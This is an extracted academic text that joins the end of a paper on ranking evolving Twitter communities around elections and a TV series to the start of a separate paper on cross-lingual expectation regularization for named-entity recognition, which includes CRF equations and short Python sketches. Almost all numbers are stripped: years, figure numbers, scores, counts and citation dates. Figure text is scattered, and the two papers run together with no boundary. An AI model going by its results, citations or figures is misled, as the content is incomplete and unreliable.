groups from turkey, italy, spain and england anticipated syriza's (the center-left anti-austerity party) potential wins in both elections and joined in to comment on all matters, such as the grexit, the future of the greek people, how the euro hit an -year low following the victory of the anti-austerity party, but also that the markets managed to shake off the initial tremors created by it. conspiracy tweets were also posted within a community mentioning operation gladio, a nato stay-behind operation during the cold war that sought to ensure communism was never able to gain a foothold in europe, which then evolved into sending warnings to the syriza party as greece was supposedly being framed as an emerging hub for terrorists. a short list of non-mainstream findings is presented in table . although there were a lot of interesting international pieces of commentary such as the above, the framework did not miss the local communities, where a strong presence was achieved by the far-left supporters and the independent greeks supporters, and a slightly milder presence by the right-wing and extreme-right-wing supporters, all of whom were rooting for their party and pointing out the mistakes of the opposing ones. one of the similarities between the two election datasets which is rather impressive lies in the almost identical structure of the two evolutions, as shown by the respective heatmaps in the evaluation section. it is also worth mentioning that many influential users (e.g., @avgerinosx, @freedybruna) and politicians (e.g., @panoskammenos, @niknikolopoulos) who were extremely active in the first election were also present in the second one.
data processing
prior to the framework application, the network data is preprocessed as follows. initially, all interaction data is filtered by discarding any corrupt messages, tweets which do not contain any interaction information, and all self-loops (self-mentions), since the latter most frequently correspond to accounts that are trying to manipulate their influence score on twitter. the filtered data is then sampled, resulting in a sequence of activity-based snapshots. figure displays the mentioning activity of the four twitter networks. the process which puts the greatest computational burden on the framework is the evolution detection. in order to speed up the searching operation, instead of using strings, the users' names are hashed, resulting in communities comprising sets of hashes. moreover, we discard all the users' hashes which appear strictly in a single timeslot, since they are considered temporal outliers. however, they are not discarded from the metadata container, as they may provide useful information. two additional acceleration measures are: the discarding of communities with a population of less than three users, and, similarly to the scheme proposed by arasu, ganti & kaushik ( ), a size comparison check prior to the jaccard similarity calculation (i.e., if the size difference between the communities makes it impossible to exceed the threshold, there is no point in measuring their similarity). every community in every timeslot is used as a query in a maximum of d older timeslots, essentially searching for similar communities in a d+1 timeslot window.
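a small sketch of the size-comparison check mentioned above: since the jaccard similarity of two sets can never exceed the ratio of the smaller to the larger set size, pairs that cannot reach the threshold are skipped before any intersection is computed (the function names are illustrative, not the authors'):

```python
def may_match(size_a, size_b, threshold):
    """size-based prefilter: jaccard(a, b) <= min(|a|, |b|) / max(|a|, |b|),
    so community pairs whose sizes are too far apart cannot pass the threshold."""
    small, large = sorted((size_a, size_b))
    return small / large >= threshold

def filtered_pairs(current, previous, threshold):
    """yield only the community pairs worth scoring with the jaccard coefficient."""
    for a in current:
        for b in previous:
            if may_match(len(a), len(b), threshold):
                yield a, b
```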
whenever a similar community is found, the search is halted; overall, two possible scenarios take place: either a new dynamic community is initiated or the query is added to an already active dynamic community. each of these dynamic communities contains information such as text, hashtags, urls, user centralities and edges, which are all stored in a dynamic community container (dycco). following the formation of these dyccos, a tf-idf procedure is applied in order to extract valuable keywords and bigrams that serve as a dycco guideline for the potential user, pointing to what might interest him or her more. the corpus of the dataset (idf) is created by using the unique set of words contained in each timeslot of every available dynamic community, and the term frequency is computed by using the unique set of tweets within the community (i.e., only one of the repetitions is used in the case that the sentence was retweeted). for the purposes of better illustration and easier browsing, the products of the framework, as seen in fig. , consist of:
• a word cloud per dynamic community containing the most popular: (a) hashtags, (b) keywords, (c) bigrams, (d) domains and (e) text items;
• the ten most influential users from each community, which could provide the potential journalist/analyst with new users who are worth following.
figure : dycco structure and content illustration for the sherlock twitter dataset. (a) a color heatmap displaying the evolution of the top dynamic communities of bbc's sherlock tv series dataset. each evolution series contains a characterization of the community based on the contained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens (the numbers on the right represent the label of each dynamic community). (b) wordclouds of the most popular keywords, bigrams, hashtags, tweets and urls acquired from community , timeslot . (c) the corresponding graphical illustration of community , timeslot under study.
figure : color heatmap displaying the evolution of the top dynamic communities of the us election dataset. each evolution series contains a characterization of the community based on the contained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens.
the color heatmap in the figure represents community size but can be adjusted to also give a comparative measure of centrality or density. by using this dycco-containing framework, the user is provided with a more meaningful view of the most important communities as well as an insight into the evolving reaction of the public with respect to various events. the respective color heatmaps for the us election and the greek election datasets are presented in figs. – .
evaluation
while executing preliminary experiments it was concluded that the framework can undoubtedly provide the user with some useful information, whether the query regarded politics, television series, specific events or even specific people/celebrities. unfortunately, there is no known method to which we can compare the performance of our framework.
figure : color heatmap displaying the evolution of the top dynamic communities of the january greek election dataset. each evolution series contains a characterization of the community based on the contained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens.
due to this predicament, we took the opportunity to introduce a content-based evaluation scheme through which we may compare the effectiveness of the proposed framework to the size-grounded ranking baseline method used in lu & brelsford ( ). since it is immensely difficult to evaluate community importance based on the tweets themselves, we employed amazon's alexa service and the contained urls of each static community to extract the category to which it belonged. alexa requires a domain as input and returns a string of categories, in a variety of languages, to which the domain belongs. in order to avoid duplicates, categories in a language other than english were translated automatically using google's translation service. unfortunately, most of the domains, even popular ones, either returned a very vague category (e.g., internet) or none at all. hence, manual domain categorization was also necessary in order to include the most popular domains. specifically, the urls were categorized using the following labels: television, video, photo, news, social networking, blog, conspiracy, personal sites, politics, shop, arts and spam. the dynamic communities of the three twitter datasets combined contained , urls, which were reduced to , unique domains. a mere , of these domains were categorized either by alexa or manually, but the overall sample of categorized urls was significant enough to be used in the categorization process. the result of the most popular category for each community is shown in the color heatmaps displayed in figs. a and – for each dataset.
figure : color heatmap displaying the evolution of the top dynamic communities of the september greek election dataset. each evolution series contains a characterization of the community based on the contained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens.
besides the labeling, the heatmap also provides information regarding the size of the community: the darker the colors get, the larger the community. by combining the two, the user is provided with a relatively good idea of where to begin his or her search. the premise on which the evaluation is based is that the content of the top – dynamic communities should match the category of the query, similarly to a search engine, since most users will not go past that many results. for example, if the queried event concerns an election, the content of the top communities should match that of news, politics, conspiracies, etc. on the other hand, if it concerns a television series, it should contain videos, television and other opinion references (social networks), art (photos), shops where the series is available, etc. the content comparison, as represented by the sum of all categories (where available) in the dynamic communities between the proposed and the baseline ranking methods, is shown in fig. .
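a minimal sketch of labeling a community by the most popular category of its cited domains, assuming a pre-built domain-to-category map (e.g., derived from alexa lookups and manual curation); the map contents shown in the docstring are hypothetical examples:

```python
from collections import Counter
from urllib.parse import urlparse

def community_category(urls, domain_categories):
    """label a community with the most frequent category of the domains cited in
    its tweets; domain_categories is a curated map such as
    {"bbc.co.uk": "news", "youtube.com": "video"} (illustrative entries)."""
    votes = Counter()
    for url in urls:
        domain = urlparse(url).netloc.lower()
        if domain.startswith("www."):
            domain = domain[4:]
        category = domain_categories.get(domain)
        if category:
            votes[category] += 1
    return votes.most_common(1)[0][0] if votes else None
```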
the tisci method seems to either surpass or tie the baseline method in the categories of interest. the single centrality ranking method is used here as an indication of the fact that the proposed method performs well as a whole even when independent features do not.
figure : content comparison between the proposed and the baseline ranking methods. results for the (a) sherlock series, (b) us election and (c) january greek election datasets.
the secondary evaluation scheme explores the diversity fluctuation. greater diversity implies more information and therefore more useful results. employing the entropy feature described in the community ranking section, but substituting bigrams for single words in order to increase the sense of diversity, we compute the mean bigram entropy for all timeslots in the top communities and compare the result of the proposed method to that of the baseline. figures – show the comparison between the two methods for all three datasets, in which the proposed method seems to retrieve more diverse communities in most timeslots. table presents the total bigram entropy over all the timeslots for each dataset. with the exception of the greek election dataset, in which the difference is quite small, the proposed method performs definitely better than the baseline.
figure : mean bigram entropy. comparison between the proposed and the lu & brelsford ( ) (size) ranking methods for the sherlock dataset.
figure : mean bigram entropy. comparison between the proposed and the lu & brelsford ( ) (size) ranking methods for the us election dataset.
figure : mean bigram entropy. comparison between the proposed and the lu & brelsford ( ) (size) ranking methods for the greek election dataset (january ).
table : total bigram entropy resulting from the proposed (tisci) and baseline (lu and brelsford) methods for the sherlock, us election and greek election datasets.
conclusions
the paper presented a framework for the extraction of useful information from osn interactions. the basis of the framework is the study of the temporal structure and the monitoring of the evolution that osn communities undergo over time. the contribution of the proposed method lies in the ranking of the detected dynamic communities with respect to structural, evolutionary and importance features. by ranking the communities, the corresponding metadata containers (dyccos) are also ranked, thus providing the user with popular urls, tweets and wordclouds of keywords and bigrams. the experimental analysis was based on three evolutionary networks extracted from user interactions on twitter. when applied to these networks, the framework uncovered a large number of dynamic communities with a variety of evolutionary characteristics. unfortunately, it also uncovered the lack of a ground-truth evaluation scheme. in order to fill this need, we proposed a content-based evaluation process which hopefully will motivate more research in this direction.
the conducted experiments highlighted the potential of the proposed framework for discovering persistent, interesting users, newsworthy pieces of information and real-world incidents around topics of interest, as well as a means to follow a story over consecutive, or even non-consecutive, time-lapses. they also revealed the complexity of the analysis and evaluation processes due to the large scale of the data to be analyzed and the absence of real ground-truth data, which the area of dynamic community detection and ranking clearly lacks. future work will involve fitting the framework with a community detection method that allows overlapping, the implementation of a better means of presentation than wordclouds and heatmaps, the discovery of a non-heuristic way of selecting the sampling time, and the use of locality sensitive hashing to further speed up the evolution detection procedure.
additional information and declarations
funding
all the funding received during this study was provided by the step h project, funded by the european commission (under grant agreement ), the reveal fp project, funded by the european commission (under contract number fp - ), and the socialsensor fp project funded by the ec under contract number . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: european commission: , fp - .
competing interests
the authors declare there are no competing interests.
author contributions
• konstantinos konstantinidis conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
• symeon papadopoulos conceived and designed the experiments, wrote the paper, and reviewed drafts of the paper.
• yiannis kompatsiaris reviewed drafts of the paper.
data availability
the following information was supplied regarding data availability: github: https://github.com/dinos /peerjdynamiccommunityranking.
references
aiello l, petkos g, martin c, corney d, papadopoulos s, skraba r, goker a, kompatsiaris i, jaimes a. . sensing trending topics in twitter. multimedia, ieee transactions on ( ): – doi . /tmm. . .
in: proceedings of the nd international conference on very large data bases, vldb ’ . vldb endowment, – . asur s, parthasarathy s, ucar d. . an event-based framework for characterizing the evolutionary behavior of interaction graphs. in: berkhin p, caruana r, wu x, eds. kdd. new york: acm, – . berberich k, bedathur s, weikum g, vazirgiannis m. . comparing apples and oranges: normalized pagerank for evolving graphs. in: proceedings of the th international conference on world wide web. new york: acm, – . blondel vd, guillaume j-l, lambiotte r, lefebvre e. . fast unfolding of com- munities in large networks. journal of statistical mechanics: theory and experiment ( ):p ( pp). brin s, page l. . the anatomy of a large-scale hypertextual web search engine. computer networks and isdn systems ( – ): – doi . /s - ( ) -x. cazabet r, amblard f. . dynamic community detection, chapter d. in: alhajj r, rokne j, eds. encyclopedia of social network analysis and mining. new york: springer new york, – . cazabet r, takeda h, hamasaki m, amblard f. . using dynamic community detection to identify trends in user-generated content. social network analysis and mining ( ): – doi . /s - - - . cormack gv, clarke cla, buettcher s. . reciprocal rank fusion outperforms condorcet and individual rank learning methods. in: proceedings of the nd international acm sigir conference on research and development in information retrieval, sigir ’ . new york: acm, – . ferlez j, faloutsos c, leskovec j, mladenic d, grobelnik m. . monitoring network evolution using mdl. in: proceedings of the ieee th international conference on data engineering, icde ’ . piscataway: ieee computer society, – . fortunato s. . community detection in graphs. physics reports ( – ): – doi . /j.physrep. . . . konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.physrep. . . http://dx.doi.org/ . /peerj-cs. gauvin l, panisson a, cattuto c. . detecting the community structure and activity patterns of temporal networks: a non-negative tensor factorization approach. plos one ( ): doi . /journal.pone. . giatsoglou m, chatzakou d, vakali a. . community detection in social media by leveraging interactions and intensities. in: lin x, manolopoulos y, srivastava d, huang g, eds. web information systems engineering wise . lecture notes in computer science, vol. . berlin heidelberg: springer, – . giatsoglou m, vakali a. . capturing social data evolution using graph clustering. ieee internet computing ( ): – . granell c, darst rk, arenas a, fortunato s, gómez s. . benchmark model to assess community structure in evolving networks. physical review e : doi . /physreve. . . greene d, doyle d, cunningham p. . tracking the evolution of communities in dynamic social networks. in: memon n, alhajj r, eds. asonam. piscataway: ieee computer society, – . gupta p, goel a, lin j, sharma a, wang d, zadeh r. . wtf: the who to follow service at twitter. in: proceedings of the nd international conference on world wide web. republic and canton of geneva: international world wide web conferences steering committee, – . jaccard p. . the distribution of the flora in the alpine zone. new phytologist ( ): – doi . /j. - . .tb .x. kim y, shim k. . twilite: a recommendation system for twitter using a proba- bilistic model based on latent dirichlet allocation. information systems : – doi . /j.is. . . . 
konstantinidis k, papadopoulos s, kompatsiaris y. . community structure and evolution analysis of osn interactions around real-world social phenomena. in: proceedings of the th panhellenic conference on informatics, pci ’ . new york: acm, – . lancichinetti a, fortunato s. . community detection algorithms: a comparative analysis. physical review e : doi . /physreve. . . lazer d, pentland a, adamic l, aral s, barabási a-l, brewer d, christakis n, contractor n, fowler j, gutmann m, jebara t, king g, macy m, roy d, van alstyne m. . computational social science. science ( ): – doi . /science. . leskovec j, lang kj, mahoney m. . empirical comparison of algorithms for network community detection. in: proceedings of the th international conference on world wide web, www ’ . new york: acm, – . lin y-r, sundaram h, kelliher a. . summarization of social activity over time: people, actions and concepts in dynamic networks. in: proceedings of the th acm conference on information and knowledge management, cikm ’ . new york: acm, – . konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.is. . . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. lu x, brelsford c. . network structure and community evolution on twitter: human behavior change in response to the japanese earthquake and tsunami. scientific reports : – . marcus a, bernstein m, badar o, karger d, madden s, miller r. . twitinfo: aggregating and visualizing microblogs for event exploration. in: proceedings of the annual conference on human factors in computing systems. acm, – . mckelvey k, rudnick a, conover m, menczer f. . visualizing communication on social media: making big data accessible. in: proc. cscw ’ workshop on collective intelligence as community discourse and action. – . mucha pj, richardson t, macon k, porter ma, onnela j-p. . community structure in time-dependent, multiscale, and multiplex networks. science ( ): – doi . /science. . newman mej. . finding community structure in networks using the eigenvectors of matrices. physical review e : doi . /physreve. . . nguyen np, dinh tn, shen y, thai mt. . dynamic social community detection and its applications. plos one ( ): – doi . /journal.pone. . nikolov d, oliveira dfm, flammini a, menczer f. . measuring online social bubbles. peerj computer science :e doi . /peerj-cs. . palla g, barabasi a-l, vicsek t. . quantifying social group evolution. nature : – doi . /nature . papadopoulos s, kompatsiaris y, vakali a, spyridonos p. . community detection in social media–performance and application considerations. data mining knowl- edge discovery ( ): – doi . /s - - -z. qu q, liu s, jensen cs, zhu f, faloutsos c. . interestingness-driven diffusion process summarization in dynamic networks. in: calders t, esposito f, hüllermeier e, meo r, eds. machine learning and knowledge discovery in databases: european conference, ecml pkdd , nancy, france, september – , . proceedings, part ii, chapter . berlin, heidelberg: springer berlin heidelberg, – . rea mc. . the problem of material constitution. philosophical review ( ) – doi . / . rosvall m, axelsson d, bergstrom ct. . the map equation. the european physical journal special topics ( ): – doi . /epjst/e - - . rosvall m, bergstrom ct. . maps of random walks on complex networks reveal community structure. 
cross-lingual projected expectation regularization for weakly supervised learning

mengqiu wang and christopher d. manning
computer science department, stanford university, stanford, ca, usa
{mengqiu,manning}@cs.stanford.edu

abstract

we consider a multilingual weakly supervised learning scenario where knowledge from annotated corpora in a resource-rich language is transferred via bitext to guide the learning in other languages. past approaches project labels across bitext and use them as features or gold labels for training.
we propose a new method that projects model expectations rather than labels, which facilities transfer of model uncertainty across language bound- aries. we encode expectations as constraints and train a discriminative crf model using generalized expectation criteria (mann and mccallum, ). evaluated on standard chinese-english and german-english ner datasets, our method demonstrates f scores of % and % when no labeled data is used. attaining the same accuracy with su- pervised crfs requires k and . k labeled sentences. furthermore, when combined with labeled examples, our method yields signifi- cant improvements over state-of-the-art super- vised methods, achieving best reported num- bers to date on chinese ontonotes and ger- man conll- datasets. introduction supervised statistical learning methods have en- joyed great popularity in natural language process- ing (nlp) over the past decade. the success of su- pervised methods depends heavily upon the avail- ability of large amounts of annotated training data. manual curation of annotated corpora is a costly and time consuming process. to date, most annotated re- sources resides within the english language, which hinders the adoption of supervised learning methods in many multilingual environments. to minimize the need for annotation, significant progress has been made in developing unsupervised and semi-supervised approaches to nlp (collins and singer ; klein ; liang ; smith ; goldberg ; inter alia) . more recent paradigms for semi-supervised learning allow mod- elers to directly encode knowledge about the task and the domain as constraints to guide learning (chang et al., ; mann and mccallum, ; ganchev et al., ). however, in a multilingual setting, coming up with effective constraints require extensive knowledge of the foreign language. bilingual parallel text (bitext) lends itself as a medium to transfer knowledge from a resource-rich language to a foreign languages. yarowsky and ngai ( ) project labels produced by an english tag- ger to the foreign side of bitext, then use the pro- jected labels to learn a hmm model. more recent work applied the projection-based approach to more language-pairs, and further improved performance through the use of type-level constraints from tag dictionary and feature-rich generative or discrimina- tive models (das and petrov, ; täckström et al., ). in our work, we propose a new projection-based method that differs in two important ways. first, we never explicitly project the labels. instead, we project expectations over the labels. this projection for experimental purposes, we designate english as the resource-rich language, and other languages of interest as “for- eign”. in our experiments, we simulate the resource-poor sce- nario using chinese and german, even though in reality these two languages are quite rich in resources. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. acts as a soft constraint over the labels, which al- lows us to transfer more information and uncertainty across language boundaries. secondly, we encode the expectations as constraints and train a model by minimizing divergence between model expectations and projected expectations in a generalized expec- tation (ge) criteria (mann and mccallum, ) framework. 
we evaluate our approach on named entity recognition (ner) tasks for english-chinese and english-german language pairs on standard public datasets. we report results in two settings: a weakly supervised setting where no labeled data or a small amount of labeled data is available, and a semi- supervised settings where labeled data is available, but we can gain predictive power by learning from unlabeled bitext. related work most semi-supervised learning approaches embody the principle of learning from constraints. there are two broad categories of constraints: multi-view con- straints, and external knowledge constraints. examples of methods that explore multi-view constraints include self-training (yarowsky, ; mcclosky et al., ), co-training (blum and mitchell, ; sindhwani et al., ), multi- view learning (ando and zhang, ; carlson et al., ), and discriminative and generative model combination (suzuki and isozaki, ; druck and mccallum, ). an early example of using knowledge as con- straints in weakly-supervised learning is the work by collins and singer ( ). they showed that the addition of a small set of “seed” rules greatly im- prove a co-training style unsupervised tagger. chang et al. ( ) proposed a constraint-driven learning (codl) framework where constraints are used to guide the selection of best self-labeled examples to be included as additional training data in an iterative em-style procedure. the kind of constraints used in applications such as ner are the ones like “the words ca, australia, ny are location” (chang et al., ). notice the similarity of this partic- a multi-view interpretation of self-training is that the self- tagged additional data offers new views to learners trained on existing labeled data. ular constraint to the kinds of features one would expect to see in a discriminative maxent model. the difference is that instead of learning the valid- ity (or weight) of this feature from labeled exam- ples — since we do not have them — we can con- strain the model using our knowledge of the domain. druck et al. ( ) also demonstrated that in an ac- tive learning setting where annotation budget is lim- ited, it is more efficient to label features than ex- amples. other sources of knowledge include lexi- cons and gazetteers (druck et al., ; chang et al., ). while it is straight-forward to see how resources such as a list of city names can give a lot of mileage in recognizing locations, we are also exposed to the danger of over-committing to hard constraints. for example, it becomes problematic with city names that are ambiguous, such as augusta, georgia. to soften these constraints, mann and mccallum ( ) proposed the generalized expectation (ge) criteria framework, which encodes constraints as a regularization term over some score function that measures the divergence between the model’s ex- pectation and the target expectation. the connection between ge and codl is analogous to the relation- ship between hard (viterbi) em and soft em, as il- lustrated by samdani et al. ( ). another closely related work is the posterior regularization (pr) framework by ganchev et al. ( ). in fact, as bellare et al. ( ) have shown, in a discriminative model these two methods opti- mize exactly the same objective. the two differ in optimization details: pr uses a em algorithm to approximate the gradients which avoids the ex- pensive computation of a covariance matrix between features and constraints, whereas ge directly cal- culates the gradient. 
however, later results (druck, ) have shown that using the expectation semir- ing techniques of li and eisner ( ), one can compute the exact gradients of ge in a conditional random fields (crf) (lafferty et al., ) at costs this is a city in the state of georgia in usa, famous for its golf courses. it is ambiguous since both augusta and georgia can also be used as person names. the different terminology employed by ge and pr may be confusing to discerning readers, but the “expectation” in the context of ge means the same thing as “marginal posterior” as in pr. no greater than computing the gradients of ordinary crf. and empirically, ge tends to perform more ac- curately than pr (bellare et al., ; druck, ). obtaining appropriate knowledge resources for constructing constraints remain as a bottleneck in applying ge and pr to new languages. however, a number of past work recognizes parallel bitext as a rich source of linguistic constraints, naturally cap- tured in the translations. as a result, bitext has been effectively utilized for unsupervised multilin- gual grammar induction (alshawi et al., ; sny- der et al., ), parsing (burkett and klein, ), and sequence labeling (naseem et al., ). a number of recent work also explored bilin- gual constraints in the context of simultaneous bilin- gual tagging, and showed that enforcing agreements between language pairs give superior results than monolingual tagging (burkett et al., ; che et al., ; wang et al., a). burkett et al. ( ) also demonstrated a uptraining (petrov et al., ) setting where tag-induced bitext can be used as ad- ditional monolingual training data to improve mono- lingual taggers. a major drawback of this approach is that it requires a readily-trained tagging models in each languages, which makes a weakly supervised setting infeasible. another intricacy of this approach is that it only works when the two models have com- parable strength, since mutual agreements are en- forced between them. projection-based methods can be very effective in weakly-supervised scenarios, as demonstrated by yarowsky and ngai ( ), and xi and hwa ( ). one problem with projected labels is that they are often too noisy to be directly used as training sig- nals. to mitigate this problem, das and petrov ( ) designed a label propagation method to au- tomatically induce a tag lexicon for the foreign lan- guage to smooth the projected labels. fossum and abney ( ) filter out projection noise by com- bining projections from from multiple source lan- guages. however, this approach is not always viable since it relies on having parallel bitext from multi- ple source languages. li et al. ( ) proposed the use of crowd-sourced wiktionary as additional re- sources for inducing tag lexicons. more recently, täckström et al. ( ) combined token-level and type-level constraints to constrain legitimate label sequences and and recalibrate the probability distri- bution in a crf. the tag dictionary used for pos tagging are analogous to the gazetteers and name lexicons used for ner by chang et al. ( ). our work is also closely related to ganchev et al. ( ). they used a two-step projection method similar to das and petrov ( ) for dependency parsing. instead of using the projected linguis- tic structures as ground truth (yarowsky and ngai, ), or as features in a generative model (das and petrov, ), they used them as constraints in a pr framework. our work differs by project- ing expectations rather than viterbi one-best labels. we also choose the ge framework over pr. 
experi- ments in bellare et al. ( ) and druck ( ) sug- gest that in a discriminative model (like ours), ge is more accurate than pr. more recently, ganchev and das ( ) further extended this line of work to directly train discriminative sequence models us- ing cross lingual projection with pr. the types of constraints applied in this new work are similar to the ones in the monolingual pr setting proposed by ganchev et al. ( ), where the total counts of la- bels of a particular kind are expected to match some fraction of the projected total counts. our work dif- fer in that we enforce expectation constraints at to- ken level, which gives tighter guidance to learning the model. approach given bitext between english and a foreign lan- guage, our goal is to learn a crf model in the foreign language from little or no labeled data. our method performs cross-lingual projected expectation regularization (cliper). for every aligned sentence pair in the bitext, we first compute the posterior marginal at each word po- sition on the english side using a pre-trained english crf tagger; then for each aligned english word, we project its posterior marginal as expectations to the aligned word position on the foreign side. figure shows a snippet of a sentence from real corpus. no- tice that if we were to directly project the viterbi best assignment from english to chinese, all three chinese words that are named entities would have gotten the wrong tags. but projecting the english crf model expectations preserves some uncertain- ties, informing the chinese model that there is a % a reception in luobu linka . . . . . . met with representatives of zhongguo ribao o: . o: . gpe: . gpe: . per: . per: . per: . gpe: . gpe: . loc: . loc: . gpe: . gpe: . gpe: . org: . org: . o: . o: . org: . org: . org: . loc: . loc: . org: . org: . loc: . loc: . loc: . per: . per: . per: . per: . o: . o: . o: . 在 罗布林卡 举行 的 招待会 . . . . . . 会见 了 中国 日报 代表 per: . per: . per: . o: . o: . o: . loc: . org: . org: . loc: . loc: . loc: . org: . o: . o: . org: . org: . org: . gpe: . loc: . loc: . gpe: . gpe: . gpe: . o: . gpe: . gpe: . per: . per: . per: . figure : diagram illustrating the projection of model expectation from english to chinese. the posterior probabilities assigned by the english crf model is shown above each english word; automatically induced word alignments are shown in red; the correct projected labels for chinese words are shown in green, and incorrect labels are shown in red. chance that “中国日报” (china daily) is an organi- zation in this context. we would like to learn a crf model in the for- eign language that has similar expectations as the projected expectations from english. to this end, we adopt the generalized expectation (ge) crite- ria framework introduced by mann and mccallum ( ). in the remainder of this section, we follow the notation used in (druck, ) to explain our ap- proach. . cliper the general idea of ge is that we can express our preferences over models through constraint func- tions. a desired model should satisfy the imposed constraints by matching the expectations on these constraint functions with some target expectations (attained by external knowledge like lexicons or in our case transferred knowledge from english). we define a constraint function φi,lj for each word po- sition i and output label assignment lj. φi,lj = is a constraint in that position i cannot take label lj. the set {l , · · · , lm} denotes all possible label as- signment for each yi, and m is number of label val- ues. 
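as a concrete illustration of the projection step just described, the short sketch below turns the english tagger's posterior marginals plus word alignments into per-token target expectations on the foreign side. this is only a sketch under our own naming assumptions, not the authors' code; the handling of foreign words with several aligned english words (averaging) and the restriction to aligned positions follow the conventions spelled out in the next paragraph, and the hard flag simply collapses each posterior to a one-hot vector, mimicking projection of viterbi one-best labels instead of expectations.

# illustrative python sketch (assumed names, not the authors' implementation)
import numpy as np
from collections import defaultdict

def project_expectations(en_marginals, alignments, n_foreign, labels, hard=False):
    """
    en_marginals: one dict per english token, mapping label -> posterior probability
                  produced by a pre-trained english crf tagger.
    alignments:   iterable of (english_index, foreign_index) word-alignment pairs.
    n_foreign:    number of tokens in the foreign sentence.
    labels:       shared label set, e.g. ["O", "PER", "LOC", "ORG", "GPE"].
    hard:         if True, collapse each posterior to a one-hot vector first
                  (hard projection); otherwise keep the full distribution (soft).
    returns {foreign_index: target expectation vector over `labels`}.
    """
    aligned_to = defaultdict(list)
    for e_i, f_i in alignments:
        aligned_to[f_i].append(e_i)

    targets = {}
    for f_i in range(n_foreign):
        if not aligned_to[f_i]:
            continue  # constraints are only defined where at least one english word aligns
        vecs = []
        for e_i in aligned_to[f_i]:
            v = np.array([en_marginals[e_i].get(lab, 0.0) for lab in labels], dtype=float)
            if hard:
                one_hot = np.zeros_like(v)
                one_hot[v.argmax()] = 1.0
                v = one_hot
            vecs.append(v)
        targets[f_i] = np.mean(vecs, axis=0)  # average over multiply-aligned english words
    return targets

with the default soft setting the english model's uncertainty is preserved, as in the 中国日报 example above; with hard=True the same routine corresponds to projecting one-best labels, the baseline revisited in the hard vs. soft comparison later in this section.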
ai is the set of english words aligned to chinese word i. φi,lj are defined for all positions i such that ai ≠ ∅; in other words, the constraint function applies only to chinese word positions that have at least one aligned english word. each φi,lj(y) can be treated as a bernoulli random variable, and we concatenate the set of all φi,lj into a random vector φ(y), where φk = φi,lj if k = i∗m + j. we drop the (y) in φ for simplicity. the target expectation over φi,lj, denoted as φ̃i,lj, is the expectation of assigning label lj to the english words in ai under the english conditional probability model. when multiple english words are aligned to the same foreign word, we average the expectations.

the expectation over φ under a conditional probability model p(y|x; θ) is denoted as e_p(y|x;θ)[φ], and simplified as eθ[φ] whenever it is unambiguous. the conditional probability model p(y|x; θ) in our case is defined as a standard linear-chain crf (we simplify notation by dropping the regularization term in the crf definition, but apply it in our experiments):

p(y \mid x; \theta) = \frac{1}{Z(x;\theta)} \exp\left( \sum_{i}^{n} \theta \cdot f(x, y_i, y_{i-1}) \right)

where f is a set of feature functions, θ are the matching parameters to learn, and n = |x|. the objective function to maximize in a standard crf is the log probability over a collection of labeled documents:

L_{CRF}(\theta) = \sum_{a=1}^{a'} \log p(y^{*}_{a} \mid x_{a}; \theta)   ( )

a′ is the number of labeled sentences, and y∗ is an observed label sequence. the objective function to maximize in ge is defined as the sum over all unlabeled examples on the foreign side of the bitext, denoted as xb, of some cost function s between the model expectation over φ (eθ[φ]) and the target expectation (φ̃). we choose s to be the negative l2 squared error sum (in general, other loss functions such as kl-divergence can also be used for s; we found the squared error to work well in practice), defined as:

L_{GE}(\theta) = \sum_{b=1}^{n'} s\left( E_{p(y_b \mid x_b;\theta)}[\phi(y_b)], \tilde{\phi}_b \right) = \sum_{b=1}^{n'} -\left\| \tilde{\phi}_b - E_{\theta}[\phi(y_b)] \right\|_{2}^{2}   ( )

n′ is the total number of unlabeled bitext sentence pairs. when both labeled and bitext training data are available, the joint objective is the sum of the crf and ge objectives above, each computed over the labeled training data and the foreign half of the bitext, respectively.

we can optimize this joint objective by computing the gradients and using a gradient-based optimization method such as l-bfgs. the gradient of lcrf decomposes into the gradients over each labeled training example (x, y∗). the gradient of lge decomposes into the gradients of s(e_p(y|xb;θ)[φ]) for each unlabeled foreign sentence xb and the constraints φ over this example. the gradients can be calculated as:

\frac{\partial}{\partial\theta} s(E_{\theta}[\phi]) = -\frac{\partial}{\partial\theta} \left( \tilde{\phi} - E_{\theta}[\phi] \right)^{T} \left( \tilde{\phi} - E_{\theta}[\phi] \right) = 2\left( \tilde{\phi} - E_{\theta}[\phi] \right)^{T} \left( \frac{\partial}{\partial\theta} E_{\theta}[\phi] \right)

we redefine the penalty vector u = (φ̃ − eθ[φ]) to be 2u. ∂eθ[φ]/∂θ is a matrix in which each column contains the gradients of all constraint functions φ with respect to a particular model parameter. it can be computed as:

\frac{\partial}{\partial\theta} E_{\theta}[\phi]
= \sum_{y} \phi(y) \, \frac{\partial}{\partial\theta} p(y \mid x; \theta)
= \sum_{y} \phi(y) \, \frac{\partial}{\partial\theta} \left( \frac{1}{Z(x;\theta)} \exp\!\left(\theta^{T} f(x,y)\right) \right)
= \sum_{y} \phi(y) \left( \frac{1}{Z(x;\theta)} \frac{\partial}{\partial\theta} \exp\!\left(\theta^{T} f(x,y)\right) + \exp\!\left(\theta^{T} f(x,y)\right) \frac{\partial}{\partial\theta} \frac{1}{Z(x;\theta)} \right)
= \sum_{y} \phi(y) \left( p(y \mid x;\theta) f(x,y)^{T} - p(y \mid x;\theta) \sum_{y'} p(y' \mid x;\theta) f(x,y')^{T} \right)
